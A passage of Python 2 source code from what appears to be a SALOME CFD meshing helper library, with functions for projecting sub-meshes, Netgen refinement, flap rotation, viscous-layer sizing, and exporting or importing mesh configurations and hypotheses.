if geompy.MinDistance(edge, vertex) < 1e-9:
nb_touching_edges += 1
if nb_touching_edges == 2:
base_vertex = vertex
break
#-
# Get the base vertex ID
base_vertex_id = geompy.GetSubShapeID(main_shape, base_vertex)
#-
# Create a sub-mesh on the group
algo = mesh.Quadrangle(geom = group)
hypo = algo.QuadrangleParameters()
hypo.SetTriaVertex(base_vertex_id)
submesh = mesh.GetSubMesh(group, group.GetName())
#-
# Update the study tree
salome.sg.updateObjBrowser(1)
#-
mtefs = MakeTriEdgeFaceSubmeshes
def ProjectEdgeSubmesh( submesh_and_edge = [None] ):
"""
Description:
Projects orthogonally an edge sub-mesh on another.
Arguments:
# submesh_and_edge
Description: The source submesh and the target sub-edge.
Type: List of1 Edge + 1 Sub-mesh
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
The source sub-mesh has to be already computed.
"""
if isinstance(submesh_and_edge, list) == False: print "[X] The first argument (submesh_and_edge) should be an array."; return
# Get the input shape(s)
submesh_and_edge = GetGUISelection(submesh_and_edge)
submesh_and_edge = GetObject(submesh_and_edge, "GEOM", silent = True) + GetObject(submesh_and_edge, "SMESH", silent = True)
#-
# Distinguish input shapes
submesh = None
edge = None
for object in submesh_and_edge:
if "SMESH_subMesh instance" in str(object): submesh = object
if "GEOM_Object" in str(object): edge = object
if None in [submesh, edge]:
print "[X] The input objects are incorrect or the Mesh module was not yet loaded."
return
#-
else:# All checks done
# Create vertexes from the sub-mesh
vertexes_from_submesh_compound = MakeVertexesFromMeshGroup(submesh, add = False)
vertexes_from_submesh = geompy.SubShapeAll(vertexes_from_submesh_compound, geompy.ShapeType["VERTEX"])
#-
# Project vertexes on the edge
projected_vertex_list = []
for vertex_from_submesh in vertexes_from_submesh:
[x, y, z] = geompy.ClosestPoints(vertex_from_submesh, edge)[1][3:6]
projected_vertex_list.append(geompy.MakeVertex(x, y, z))
#-
# Split the edge with projected vertexes
discretized_edge = geompy.MakePartition([edge], projected_vertex_list)
#-
# Get vertex parameters on the input edge
edge_length = geompy.BasicProperties(edge)[0]
reordered_edges = GetReorderedEdges(discretized_edge, add = False)
nb_sub_edges = len(reordered_edges)
parameter_list = []
total_distance = 0
for sub_edge in reordered_edges:
sub_edge_length = geompy.BasicProperties(sub_edge)[0]
parameter = (total_distance + sub_edge_length) / edge_length
parameter_list.append(parameter)
if len(parameter_list) == nb_sub_edges - 1:
break
total_distance += sub_edge_length
#-
# Get the mesh
mesh = smesh.Mesh(submesh.GetMesh())
#-
# Create a sub-mesh on the edge
algo = mesh.Segment(geom = edge)
fixed_points_hypo = algo.FixedPoints1D(parameter_list, [1] * nb_sub_edges, [])
mesh.GetSubMesh(edge, edge.GetName())
smesh.SetName(fixed_points_hypo, edge.GetName())
#-
# Update the study tree
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
#-
pes = ProjectEdgeSubmesh
def MakeNetgenRefinement( size, hypo_and_area = [None], ratio = 0.7, test = False ):
"""
Description:
Create an arbitrary 3D refinement area in a Netgen hypothesis.
Arguments:
# size
Description: The desired cell size in the refinement area.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# hypo_and_area
Description: The volume defining the refinement area and the Netgen hypothesis.
Type: List of 1 Mesh hypothesis + 1 Solid
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# ratio
Description: Defines the distance between edges describing the refinement area. If equals one, this distance equals the desired cell size. If lower than one, this distance is increased.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 0.7
# test
Description: If equals True, the edges are not created, but the number of necessary edge is displayed in the Python console.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: Compound
Number: 1
Name: "RefinementEdges"
Conditions of use:
-
"""
if isinstance(size, str): print "[X] The first argument (size) should be a float number."; return
if isinstance(hypo_and_area, list) == False: print "[X] The second argument (hypo_and_area) should be an array."; return
# Get the input shape(s)
hypo_and_area = GetGUISelection(hypo_and_area)
hypo_and_area = GetObject(hypo_and_area, "GEOM", silent = True) + GetObject(hypo_and_area, "NETGENPlugin", silent = True)
#-
# Distinguish input shapes
hypo = None
area = None
for object in hypo_and_area:
if str(object)[1:45] == "NETGENPlugin._objref_NETGENPlugin_Hypothesis": hypo = object
if str(object)[1:25] == "GEOM._objref_GEOM_Object": area = object
if None in [hypo, area]:
print "[X] The input objects are incorrect or the Mesh module was not yet loaded."
return
hypothesis_type = hypo.GetName()
if str(hypothesis_type) != "NETGEN_Parameters_2D" and str(hypothesis_type) != "NETGEN_Parameters":
print "[X] The selected hypothesis is not a Netgen 1D - 2D or Netgen 1D - 2D - 3D hypothesis."
return
#-
else:# All checks done
# Get the area bounding box
[x_min, x_max, y_min, y_max, z_min, z_max] = geompy.BoundingBox(area)
x_margin = (x_max - x_min) / 10000
x_min += x_margin
x_max -= x_margin
#-
# Create edges
void_compound = geompy.MakeCompound([])
nb_edges_x = int((x_max - x_min) / size * ratio)
nb_edges_y = int((y_max - y_min) / size * ratio)
x_step = (x_max - x_min) / (float(nb_edges_x) - 1)
y_step = (y_max - y_min) / (float(nb_edges_y) - 1)
nb_edges = nb_edges_x * nb_edges_y
print "[i]", nb_edges, " edges to create."
if test == False:
AddToStudy(void_compound, "RefinementEdges")
edges = []
x = x_min
n = 1
for i in range(nb_edges_x):
y = y_min
for j in range (nb_edges_y):
start_vertex = geompy.MakeVertex(x, y, z_min)
end_vertex = geompy.MakeVertex(x, y, z_max)
edge = geompy.MakeEdge(start_vertex, end_vertex)
edges.append(edge)
n += 1
y += y_step
x += x_step
edge_compound = geompy.MakeCompound(edges)
common = geompy.MakeCommon(area, edge_compound)
edges = geompy.SubShapeAll(common, geompy.ShapeType["EDGE"])
n = 1
for edge in edges:
geompy.addToStudyInFather(void_compound, edge, "edge_" + str(n))
hypo.SetLocalSizeOnShape(edge, size)
n += 1
#-
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return void_compound
mnr = MakeNetgenRefinement
def SetNetgenRefinement( size, hypo_and_compound = [None], clear = False ):
"""
Description:
Applies a new cell size on a Netgen refinement created thanks to the MakeNetgenRefinement function.
Arguments:
# size
Description: The desired cell size in the refinement area.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# hypo_and_compound
Description: The refinement compound containing refinement edges (eg. "RefinementEdges_1") and the Netgen hypothesis.
Type: List of 1 Mesh hypothesis + 1 Compound
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
The new cell size should not be lower than the one used to create the Netgen refinement.
"""
if isinstance(size, str): print "[X] The first argument (size) should be a float number."; return
if isinstance(hypo_and_compound, list) == False: print "[X] The second argument (hypo_and_compound) should be an array."; return
# Get the input shape(s)
hypo_and_compound = GetGUISelection(hypo_and_compound)
hypo_and_compound = GetObject(hypo_and_compound, "GEOM", silent = True) + GetObject(hypo_and_compound, "NETGENPlugin", silent = True)
#-
# Distinguish input shapes
hypo = None
refinement_edge_compound = None
for object in hypo_and_compound:
if str(object)[1:45] == "NETGENPlugin._objref_NETGENPlugin_Hypothesis": hypo = object
if str(object)[1:25] == "GEOM._objref_GEOM_Object": refinement_edge_compound = object
if None in [hypo, refinement_edge_compound]:
print "[X] The input objects are incorrect or the Mesh module was not yet loaded."
return
hypothesis_type = hypo.GetName()
if str(hypothesis_type) != "NETGEN_Parameters_2D" and str(hypothesis_type) != "NETGEN_Parameters":
print "[X] The selected hypothesis is not a Netgen 1D - 2D or Netgen 1D - 2D - 3D hypothesis."
return
#-
else:# All checks done
# Get the refinement edge compound ID
refinement_edge_compound_id = refinement_edge_compound.GetStudyEntry()
split_refinement_edge_compound_id = refinement_edge_compound_id.split(":")
#-
# Get the study object IDs
study_object_ids = ListComponentShapes("GEOM", output = "ID")
#-
# Get the refinement edges
refinement_edges = []
for study_object_id in study_object_ids:
split_study_object_id = study_object_id.split(":")
if len(split_study_object_id) >= 4:
if split_study_object_id[3] == split_refinement_edge_compound_id[3] and len(split_study_object_id) > 4:
refinement_edge = salome.myStudy.FindObjectID(study_object_id).GetObject()
refinement_edges.append(refinement_edge)
#-
# Clear the netgen hypo
if clear == True:
try:
local_sizes = hypo.GetLocalSizeEntries()
for local_size in local_sizes: hypo.UnsetLocalSizeOnEntry(local_size)
except: pass
#-
# Set the new refinement size
for refinement_edge in refinement_edges:
hypo.SetLocalSizeOnShape(refinement_edge, size)
#-
snr = SetNetgenRefinement
def ClearNetgenRefinement( hypo = None ):
"""
Description:
Cancels all Netgen refinements.
Arguments:
# hypo
Description: The Netgen hypothesis to clean.
Type: Mesh hypothesis
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
-
"""
# Get the input shape(s)
hypo = GetGUISelection(hypo)
hypo = GetObject(hypo, "NETGENPlugin")
#-
# Make this function recursive
if isinstance(hypo, list):
for sub_object in hypo:
ClearNetgenRefinement(sub_object)
return
#-
# Check the input shape existence
if "error" in [hypo] or None in [hypo]: return
#-
# Check the input shape characteritics
if str(hypo)[1:45] != "NETGENPlugin._objref_NETGENPlugin_Hypothesis":
print "[X] The input object is incorrect or the Mesh module was not yet loaded."
return
hypothesis_type = hypo.GetName()
if str(hypothesis_type) != "NETGEN_Parameters_2D" and str(hypothesis_type) != "NETGEN_Parameters":
print "[X] The selected hypothesis is not a Netgen 1D - 2D or Netgen 1D - 2D - 3D hypothesis."
return
#-
else:# All checks done
try:
local_sizes = hypo.GetLocalSizeEntries()
for local_size in local_sizes: hypo.UnsetLocalSizeOnEntry(local_size)
except: pass
cnr = ClearNetgenRefinement
def ProjectMeshGroupOnFace( group_and_face = [None] ):
"""
Description:
Moves nodes of a Mesh Group by projecting them on a Face defined in the Geometry module.
Arguments:
# group_and_face
Description: The group to project and the target face.
Type: List of 1 Mesh Group+ 1 Face
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
-
"""
# Get the input shape(s)
group_and_face = GetGUISelection(group_and_face)
group_and_face = GetObject(group_and_face, "GEOM", silent = True) + GetObject(group_and_face, "SMESH", silent = True)
#-
# Distinguish input shapes
group = None
face = None
for object in group_and_face:
if "SMESH._objref_SMESH_Group" in str(object):
group = object
if "GEOM._objref_GEOM_Object" in str(object):
nb_faces = int(geompy.WhatIs(object).split("\n")[3].split(": ")[1])
if nb_faces == 1:
face = object
if None in [group, face]:
print "[X] A node group and a face should be selected."
return
#-
else:# All checks done
# Get the group mesh
group_mesh = group.GetMesh()
group_mesh = smesh.Mesh(group_mesh)
#-
# Get the node Ids
group_nodes_ids = group.GetNodeIDs()
#-
# Project the nodes
for group_node_id in group_nodes_ids:
[x, y, z] = group_mesh.GetNodeXYZ(group_node_id)
vertex = geompy.MakeVertex(x, y, z)
projected_vertex = geompy.MakeProjection(vertex, face)
[new_x, new_y, new_z] = geompy.PointCoordinates(projected_vertex)
group_mesh.MoveNode(group_node_id, new_x, new_y, new_z)
#-
pmgof = ProjectMeshGroupOnFace
def MakeVertexesFromMeshGroup( group = None, add = True ):
"""
Description:
Creates a compound of vertexes from a mesh group.
Arguments:
# group
Description: The group from wich to create vertexes.
Type: Mesh Group
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: -
Type: Compound of Vertexes
Number: 1
Name: "VertexesFromMeshGroup"
Conditions of use:
-
"""
# Get the input shape(s)
group = GetGUISelection(group)
group = GetObject(group, "SMESH")
#-
# Make this function recursive
if isinstance(group, list):
return_list = []
for sub_object in group:
return_list.append(MakeVertexesFromMeshGroup(sub_object, add))
return return_list
#-
# Check the input shape existence
if "error" in [group] or None in [group]: return
#-
else:
# Get the group mesh
group_mesh = group.GetMesh()
#-
# Get the node Ids
try:
group_nodes_ids = group.GetNodeIDs()
except:
group_nodes_ids = group.GetNodesId()
#-
# Create the vertexes
vertexes = []
for group_node_id in group_nodes_ids:
[x, y, z] = group_mesh.GetNodeXYZ(group_node_id)
vertex = geompy.MakeVertex(x, y, z)
vertexes.append(vertex)
#-
# Put the vertexes in a compound
vertex_compound = geompy.MakeCompound(vertexes)
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(vertex_compound, "VertexesFromMeshGroup")
return vertex_compound
#-
mvfmg = MakeVertexesFromMeshGroup
def RotateFlapGenerateAndExportMeshInAmshFormat( angles, group_file = "cfdmsh_grps", mesh_file = "cfdmsh_msh", domain = "domain", fixed_edges = "fixed_edges", rotating_face = "rotating_face", rotating_edges = "rotating_edges", flap_axis = "flap_axis", keep_mesh = True, help = False ):
"""
Description:
Rotates a flap, generates a mesh and exports it into an .amsh file readable with Edge 5.0.0.
Arguments:
# angles
Description: The list of flap angles to compute
Type: List of Floats
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# group_file
Description: The name of the group file to import in the final partitions.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "cfdmsh_grps"
# mesh_file
Description: The name of the mesh file to import in the meshes.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "cfdmsh_msh"
# domain
Description: The face describing the domain before cutting the flap face.
Type: Face
GUI selection: -
Selection by name: yes
Recursive: -
Default value: "domain"
# fixed_edges
Description: The compound of edges which won't move with the flap.
Type: Compound of Edges
GUI selection: -
Selection by name: yes
Recursive: -
Default value: "fixed_edges"
# rotating_face
Description: The face describing the flap.
Type: Face
GUI selection: -
Selection by name: yes
Recursive: -
Default value: "rotating_face"
# rotating_edges
Description: The compound of edges which move with the flap.
Type: Compound of Edges
GUI selection: -
Selection by name: yes
Recursive: -
Default value: "rotating_edges"
# flap_axis
Description: The axis of the flap rotation.
Type: Edge
GUI selection: -
Selection by name: yes
Recursive: -
Default value: "flap_axis"
# keep_mesh
Description: If equals True, meshes are not cleared after each mesh export.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# help
Description: This argument is passed to the ExportAmshFile function.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
To use this function, the group file and mesh file have to be previously generated manually and the hypotheses to be used in the mesh have to be present in the study.
"""
pi = 3.141592654
# Get the input shape(s)
[domain, fixed_edges, rotating_face, rotating_edges, flap_axis] = GetObject([domain, fixed_edges, rotating_face, rotating_edges, flap_axis], "GEOM")
#-
# Check the input shape existence
if "error" in [domain, fixed_edges, rotating_face, rotating_edges, flap_axis]:
return
#-
else:
for angle in angles:# For each rotation angle...
# Convert angle from degrees to radians
angle_in_radians = angle * pi / 180
#-
# Rotate the flap
rotated_flap_face = geompy.MakeRotation(rotating_face, flap_axis, angle_in_radians)
rotated_flap_edges = geompy.MakeRotation(rotating_edges, flap_axis, angle_in_radians)
#-
# Cut and partition the domain
cut_domain = geompy.MakeCut(domain, rotated_flap_face)
partition = geompy.MakePartition([cut_domain], [rotated_flap_edges, fixed_edges], Limit = geompy.ShapeType["FACE"])
#-
# Import the geometrical groups
partition_name = "Partition_" + str(angle) + "deg"
geompy.addToStudy(partition, partition_name)
ImportGeometricalGroups(partition_name, group_file)
#-
# Create the mesh
mesh_name = "Mesh_" + str(angle) + "deg"
mesh = smesh.Mesh(partition, mesh_name)
#-
# Import the mesh configuration
ImportMeshConfiguration(mesh, mesh_file)
#-
# Compute the mesh
mesh.Compute()
#-
# Export the mesh
ExportAmshFile(mesh, mesh_name, help = help)
#-
if keep_mesh == False:
mesh.Clear()
rfgaemiaf = RotateFlapGenerateAndExportMeshInAmshFormat
def ViscousLayerScaleFactor( total_thick, wall_thick, ratio = 1.2 ):
"""
Description:
Calculates the parameters to use in a "Nb. Segment" hypothesis from common viscous layers parameters (total thickness, wall thickness and a ratio).
Arguments:
# total_thick
Description: The viscous layer total thickness.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# wall_thick
Description: The desired thickness of the layer touching the wall.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# ratio
Description: The desired ratio between each layer n and n+1.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1.2
Returned Values:
"dim" value: -
"single" value: -
Type: Float
Number: 2
Name: -
Conditions of use:
-
"""
# Compute the thicknesses of an infinite number of layers
layer_thicknesses = [wall_thick]
for i in range(1000):
layer_thicknesses.append(layer_thicknesses[i] * ratio)
#-
# Compute the total thicknesses for an infinite number of layers
total_thicknesses = [wall_thick]
for i in range(len(layer_thicknesses) - 1):
total_thicknesses.append(total_thicknesses[i] + layer_thicknesses[i + 1])
#-
# Get the number of layers
for i in range(len(total_thicknesses)):
if total_thicknesses[i] > total_thick:
nb_layers = i + 1
break
#-
# compute the scale betwenn first and last layer
scale = layer_thicknesses[nb_layers - 1] / wall_thick
#-
# Print the number of layers and scale
print "Number of Segments = \t%i"%(nb_layers)
print "Scale Factor = \t%.5f"%(scale)
#-
return [nb_layers, scale]
vlsf = ViscousLayerScaleFactor
def ExportMeshConfiguration( mesh = None, file = "cfdmsh_msh" ):
"""
Description:
Exports into a file the name of the algorithms, hypotheses and groups associated to a mesh and its sub-meshes.
Arguments:
# mesh
Description: The source mesh.
Type: Mesh
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: None
# file
Description: The name of the file to write.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "cfdmsh_msh"
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
All the hypotheses and algorithms used by the mesh and its sub-meshes must have a different name. Also, the names of all mesh groups have to be the same as the names of their associated geometrical groups.
"""
# Get the input shape(s)
mesh = GetGUISelection(mesh, uniq = True)
mesh = GetObject(mesh, "SMESH")
#-
# Check the input shape existence
if "error" in [mesh] or None in [mesh]: return
#-
else:# All checks done
if "SMESH_Mesh instance" in str(mesh) or "meshProxy instance" in str(mesh) or "Mesh object" in str(mesh):
try:
mesh = smesh.Mesh(mesh)
except:
pass
else:
print "[X] The input object is not a mesh or the Mesh module was not yet loaded."; return
#-
# Open the hypothesis file
hypothesis_file = open(file, "w")
#-
# Get the mesh shape
mesh_shape = mesh.GetShape()
mesh_shape_name = mesh_shape.GetName()
#-
# Get the shape hypotheses
shape_hypotheses = mesh.GetHypothesisList(mesh_shape)
#-
# Check if hypotheses are associated to the mesh shape
nb_shape_hypotheses = len(shape_hypotheses)
#-
if nb_shape_hypotheses > 0:# If so...
# Write the shape flag
hypothesis_file.write("SHAPE:\n")
#-
for shape_hypothesis in shape_hypotheses:# For each shape hypothesis...
# Get the hypothesis name
shape_hypothesis_name = smeshBuilder.GetName(shape_hypothesis)
#-
# Write the hypothesis
hypothesis_file.write("%s\n"%(shape_hypothesis_name))
#-
# Get the shape groups
mesh_shape_groups = geompy.GetGroups(mesh_shape)
#-
for group in mesh_shape_groups:# For each group...
# Get the group name
group_name = group.GetName()
#-
# Get the hypothesis list
group_hypotheses = mesh.GetHypothesisList(group)
#-
# Check if hypotheses are associated to the group
nb_group_hypotheses = len(group_hypotheses)
#-
if nb_group_hypotheses > 0:# If so...
# Write the group name
hypothesis_file.write("SUBMESH:%s\n"%(group_name))
#-
for group_hypothesis in group_hypotheses:# For each hypothesis...
# Get the hypothesis name
group_hypothesis_name = smeshBuilder.GetName(group_hypothesis)
#-
# Write the hypothesis
hypothesis_file.write("%s\n"%(group_hypothesis_name))
#-
# Get the mesh groups
mesh_groups = mesh.GetGroups()
#-
# Check if there are mesh groups
nb_mesh_groups = len(mesh_groups)
#-
if nb_mesh_groups > 0:# If so...
# Write the group flag
hypothesis_file.write("GROUPS:")
#-
for mesh_group in mesh_groups:# For each mesh group...
# Get the mesh group name
mesh_group_name = mesh_group.GetName()
#-
# Write the mesh group name
hypothesis_file.write("%s\t"%(mesh_group_name))
#-
# Close hypothesis file
hypothesis_file.close()
#-
emc = ExportMeshConfiguration
def ImportMeshConfiguration( mesh = None, file = "cfdmsh_msh" ):
"""
Description:
Imports into a mesh algorithms, hypotheses and group names from a file created with the ExportMeshConfiguration function.
Arguments:
# mesh
Description: The target mesh.
Type: Mesh
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# file
Description: Name of the file to read.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "cfdmsh_msh"
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
All the hypotheses and algorithms present in the file has to be also present in the study. Also, there must be, in the geometrical object associated to the target mesh, groups having the same name as the groups present in the file.
"""
# Get the input shape(s)
mesh = GetGUISelection(mesh, uniq = True)
mesh = GetObject(mesh, "SMESH")
#-
# Make this function recursive
if isinstance(mesh, list):
return_list = []
for sub_object in mesh:
return_list.append(ImportMeshConfiguration(sub_object, file))
return return_list
#-
# Check the input shape existence
if "error" in [mesh] or None in [mesh]: return
#-
else:# All checks done
if "SMESH_Mesh instance" in str(mesh) or "meshProxy instance" in str(mesh) or "Mesh object" in str(mesh):
try:
mesh = smesh.Mesh(mesh)
except:
pass
else:
print "[X] The input object is not a mesh or the Mesh module was not yet loaded."; return
# Get the mesh shape
mesh_shape = mesh.GetShape()
#-
# Get the mesh groups
shape_groups = geompy.GetGroups(mesh_shape)
shape_group_names = [group.GetName() for group in shape_groups]
nb_shape_groups = len(shape_groups)
#-
# Open the hypothesis file
hypothesis_file = open(file, "r")
#-
# Read the file
for line in hypothesis_file:# For each line in the hypothesis file...
is_a_sub_mesh_line = (line.find("SUBMESH:") == 0)
is_a_shape_line = (line.find("SHAPE:") == 0)
is_a_group_line = (line.find("GROUPS:") == 0)
geometry = None
if is_a_shape_line == True:# If it is a "shape" line...
group = None
elif is_a_sub_mesh_line == True:# If it is a "submesh" line...
# Get the group name
group_name = line[8: - 1]
#-
# Get the group
for i in range(nb_shape_groups):# For all groups in the shape...
if group_name == shape_group_names[i]:# Compare their name with the one from the file...
group = shape_groups[i]# If matched, extract the group in the shape group list
break
#-
# Create a submesh associated to this group
mesh.GetSubMesh(group, group_name)
#
elif is_a_group_line == True:
# Get the group names
group_names = line[7: - 1]
group_names = group_names.split("\t")
#-
for group_name in group_names:# For each group name...
# Get the shape group
shape_group = None
for i in range(nb_shape_groups):# For all groups in the shape...
if group_name == shape_group_names[i]:# Compare their name with the one from the file...
shape_group = shape_groups[i]# If matched, extract the group in the shape group list
break
#-
# Create the mesh group
mesh_group = mesh.GroupOnGeom(shape_group)
#-
#-
else:# If it is a hypothesis line...
# Get the hypothesis name
hypothesis_name = line[:-1]
#-
# Get the hypothesis
try:# Look in the hypotheses...
hypothesis = salome.myStudy.FindObjectByPath("/Mesh/Hypotheses/%s"%(hypothesis_name)).GetObject()
except AttributeError:# Else, in the algorithms...
hypothesis = salome.myStudy.FindObjectByPath("/Mesh/Algorithms/%s"%(hypothesis_name)).GetObject()
#-
# Add the hypothesis to the mesh
mesh.AddHypothesis(hypothesis, group)
#-
#-
# Update the study tree
salome.sg.updateObjBrowser(1)
#-
# Close hypothesis file
hypothesis_file.close()
#-
imc = ImportMeshConfiguration
def ExportHypotheses( hypo = [None], file = "cfdmsh_hps" ):
"""
Description:
Exports hypotheses into a text file mesh.
Arguments:
# hypo
Description: The list of hypotheses to export.
Type: Mesh
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# file
Description: The name of the file to write.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "cfdmsh_hps"
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
-
"""
# Get the input shape(s)
hypo = GetGUISelection(hypo)
hypo = GetObject(hypo, "SMESH")
#-
# Check the input shape existence
if "error" in hypo or None in hypo: return
#-
else:# All checks done
# Open the hypothesis file
hypothesis_file = open(file, "w")
#-
for hypothesis in hypo:
# Get the hypothesis name
hypothesis_name = smeshBuilder.GetName(hypothesis)
#-
# Get the hypothesis type
hypothesis_type = hypothesis.GetName()
#-
# Add the hypothesis to the hypothesis file
hypothesis_file.write("TYPE:\n%s\n"%(hypothesis_type))
hypothesis_file.write("NAME:\n%s\n"%(hypothesis_name))
#-
# Add the hypothesis parameters to the hypothesis file
if hypothesis_type == "SegmentLengthAroundVertex":
hypothesis_file.write("LENGTH:\n%s\n"%(hypothesis.GetLength()))
if hypothesis_type == "LocalLength":
hypothesis_file.write("LENGTH:\n%s\n"%(hypothesis.GetLength()))
hypothesis_file.write("PRECISION:\n%s\n"%(hypothesis.GetPrecision()))
if hypothesis_type == "MaxLength":
hypothesis_file.write("LENGTH:\n%s\n"%(hypothesis.GetLength()))
hypothesis_file.write("PRESSTIMATEDLENGTH:\n%s\n"%(hypothesis.GetPreestimatedLength()))
hypothesis_file.write("USEPRESSTIMATEDLENGTH:\n%s\n"%(hypothesis.GetUsePreestimatedLength()))
if hypothesis_type == "Arithmetic1D":
hypothesis_file.write("STARTLENGTH:\n%s\n"%(hypothesis.GetLength(1)))
hypothesis_file.write("ENDLENGTH:\n%s\n"%(hypothesis.GetLength(0)))
if hypothesis_type == "GeometricProgression":
hypothesis_file.write("STARTLENGTH:\n%s\n"%(hypothesis.GetStartLength()))
hypothesis_file.write("COMMONRATIO:\n%s\n"%(hypothesis.GetCommonRatio()))
if hypothesis_type == "FixedPoints1D":
hypothesis_file.write("NBSEGMENTS:\n%s\n"%(hypothesis.GetNbSegments()))
hypothesis_file.write("POINTS:\n%s\n"%(hypothesis.GetPoints()))
if hypothesis_type == "StartEndLength":
hypothesis_file.write("STARTLENGTH:\n%s\n"%(hypothesis.GetLength(1)))
hypothesis_file.write("ENDLENGTH:\n%s\n"%(hypothesis.GetLength(0)))
if hypothesis_type == "NumberOfSegments":
hypothesis_file.write("NUMBEROFSEGMENTS:\n%s\n"%(hypothesis.GetNumberOfSegments()))
hypothesis_file.write("DISTRTYPE:\n%s\n"%(hypothesis.GetDistrType()))
try: hypothesis_file.write("SCALEFACTOR:\n%s\n"%(hypothesis.GetScaleFactor()))
except: pass
try: hypothesis_file.write("TABLEFUNCTION:\n%s\n"%(hypothesis.GetTableFunction()))
except: pass
try: hypothesis_file.write("EXPRESSIONFUNCTION:\n%s\n"%(hypothesis.GetExpressionFunction()))
except: pass
hypothesis_file.write("CONVERSIONMODE:\n%s\n"%(hypothesis.ConversionMode()))
if hypothesis_type == "Deflection1D":
hypothesis_file.write("DEFLECTION:\n%s\n"%(hypothesis.GetDeflection()))
if hypothesis_type == "Adaptive1D":
hypothesis_file.write("MINSIZE:\n%s\n"%(hypothesis.GetMinSize()))
hypothesis_file.write("MAXSIZE:\n%s\n"%(hypothesis.GetMaxSize()))
hypothesis_file.write("DEFLECTION:\n%s\n"%(hypothesis.GetDeflection()))
if hypothesis_type == "AutomaticLength":
hypothesis_file.write("FINENESS:\n%s\n"%(hypothesis.GetFineness()))
if hypothesis_type == "LengthFromEdges":
pass
if hypothesis_type == "MaxElementArea":
hypothesis_file.write("MAXELEMENTAREA:\n%s\n"%(hypothesis.GetMaxElementArea()))
if hypothesis_type == "QuadrangleParams":
hypothesis_file.write("QUADTYPE:\n%s\n"%(hypothesis.GetQuadType()))
if hypothesis_type == "NumberOfLayers2D":
hypothesis_file.write("NUMBEROFLAYERS:\n%s\n"%(hypothesis.GetNumberOfLayers()))
if hypothesis_type == "NETGEN_Parameters_2D_ONLY" or hypothesis_type == "NETGEN_Parameters_3D":
hypothesis_file.write("MAXSIZE:\n%s\n"%(hypothesis.GetMaxSize()))
hypothesis_file.write("MINSIZE:\n%s\n"%(hypothesis.GetMinSize()))
hypothesis_file.write("FINENESS:\n%s\n"%(hypothesis.GetFineness()))
hypothesis_file.write("GROWTHRATE:\n%s\n"%(hypothesis.GetGrowthRate()))
hypothesis_file.write("USESURFACECURVATURE:\n%s\n"%(hypothesis.GetUseSurfaceCurvature()))
hypothesis_file.write("QUADALLOWED:\n%s\n"%(hypothesis.GetQuadAllowed()))
hypothesis_file.write("OPTIMIZE:\n%s\n"%(hypothesis.GetOptimize()))
if hypothesis_type == "NETGEN_Parameters_2D" or hypothesis_type == "NETGEN_Parameters":# 3D
hypothesis_file.write("FINENESS:\n%s\n"%(hypothesis.GetFineness()))
hypothesis_file.write("GROWTHRATE:\n%s\n"%(hypothesis.GetGrowthRate()))
hypothesis_file.write("MAXSIZE:\n%s\n"%(hypothesis.GetMaxSize()))
hypothesis_file.write("MINSIZE:\n%s\n"%(hypothesis.GetMinSize()))
hypothesis_file.write("SECONDORDER:\n%s\n"%(hypothesis.GetSecondOrder()))
hypothesis_file.write("NBSEGPEREDGE:\n%s\n"%(hypothesis.GetNbSegPerEdge()))
hypothesis_file.write("NBSEGPERRADIUS:\n%s\n"%(hypothesis.GetNbSegPerRadius()))
hypothesis_file.write("USESURFACECURVATURE:\n%s\n"%(hypothesis.GetUseSurfaceCurvature()))
hypothesis_file.write("QUADALLOWED:\n%s\n"%(hypothesis.GetQuadAllowed()))
hypothesis_file.write("OPTIMIZE:\n%s\n"%(hypothesis.GetOptimize()))
hypothesis_file.write("FUSEEDGES:\n%s\n"%(hypothesis.GetFuseEdges()))
if hypothesis_type == "NETGEN_SimpleParameters_2D" or hypothesis_type == "NETGEN_SimpleParameters_3D":
hypothesis_file.write("NUMBEROFSEGMENTS:\n%s\n"%(hypothesis.GetNumberOfSegments()))
hypothesis_file.write("LOCALLENGTH:\n%s\n"%(hypothesis.GetLocalLength()))
hypothesis_file.write("MAXELEMENTAREA:\n%s\n"%(hypothesis.GetMaxElementArea()))
